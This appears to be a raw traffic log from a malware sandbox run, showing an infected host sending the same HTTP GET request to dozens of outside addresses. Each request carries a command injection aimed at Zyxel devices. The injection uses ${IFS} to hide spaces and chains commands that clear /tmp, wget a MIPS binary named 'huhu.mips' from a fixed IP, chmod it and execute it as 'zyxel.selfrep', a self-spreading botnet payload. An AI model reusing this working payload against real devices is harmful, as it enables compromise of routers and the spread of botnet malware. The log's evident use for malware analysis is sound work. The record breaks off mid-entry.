                                              Jan 29, 2024 07:02:58.505372047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              225192.168.2.144581293.162.88.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505407095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              226192.168.2.143658283.160.144.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505474091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              227192.168.2.1441598165.129.29.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505523920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              228192.168.2.146054012.53.54.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505527973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              229192.168.2.143657892.94.54.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505573988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              230192.168.2.145133059.179.95.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505625963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              231192.168.2.143963237.208.167.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505669117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              232192.168.2.144220649.250.109.5443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505683899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              233192.168.2.1443212217.37.16.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505759001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              234192.168.2.144805653.56.146.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505779982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              235192.168.2.1432936154.10.239.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505878925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              236192.168.2.1436530165.53.50.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505929947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              237192.168.2.144300664.108.181.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505935907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              238192.168.2.143492838.158.109.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.505983114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              239192.168.2.1450126199.253.144.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506017923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              240192.168.2.1437164123.135.174.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506102085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              241192.168.2.146091058.35.34.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506103039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              242192.168.2.1435388146.38.12.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506160975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              243192.168.2.1451804187.3.11.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506186008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              244192.168.2.1443102182.238.38.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506231070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              245192.168.2.1447886190.40.31.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506259918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              246192.168.2.145844494.108.118.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506277084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              247192.168.2.1459820170.208.194.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506334066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              248192.168.2.1459206188.196.68.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506388903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              249192.168.2.1448170203.76.239.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506427050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              250192.168.2.144811642.30.44.89443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506472111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              251192.168.2.143940445.248.86.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.506659031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              252192.168.2.146073295.32.244.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.514986038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              253192.168.2.144500047.158.51.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515036106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              254192.168.2.1434786136.160.232.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515038967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              255192.168.2.1438204120.202.225.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515038967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              256192.168.2.143422227.161.29.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515038967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              257192.168.2.1437794106.89.179.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515069008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              258192.168.2.1441084183.250.128.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515098095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              259192.168.2.144655258.129.23.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515151978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              260192.168.2.1454794190.242.151.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515340090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              261192.168.2.1442690133.29.32.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515377998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              262192.168.2.1443868107.24.40.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515434027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              263192.168.2.1433534125.105.44.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515434027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              264192.168.2.145098448.25.177.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515455008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              265192.168.2.1441004103.109.241.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515507936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              266192.168.2.144624693.40.204.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515547037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              267192.168.2.1460862211.230.18.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515631914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              268192.168.2.1435936138.216.94.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515670061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              269192.168.2.1441408211.57.155.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:58.515672922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              270192.168.2.1434558126.159.114.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471429110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              271192.168.2.145114874.182.140.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471470118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              272192.168.2.145241892.50.87.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471498966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              273192.168.2.1452154183.132.12.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471554995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              274192.168.2.145932093.221.154.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471607924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              275192.168.2.1449080146.237.118.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471621990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              276192.168.2.1434086124.82.6.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471646070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              277192.168.2.144861250.67.125.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471674919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              278192.168.2.1456614151.78.51.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471703053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              279192.168.2.144996436.221.178.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471751928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              280192.168.2.1448050195.47.9.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471781015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              281192.168.2.14421628.191.137.71443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471836090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              282192.168.2.1438640179.128.71.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.471936941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              283192.168.2.144910854.32.223.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:02:59.501266956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              284192.168.2.1438724193.111.137.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:00.536792040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              285192.168.2.144958271.26.182.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:00.536842108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              286192.168.2.1450598154.165.0.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:00.536848068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              287192.168.2.1460370108.239.69.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:00.536914110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              288192.168.2.145658072.85.36.231443
                                              TimestampBytes transferredDirectionData
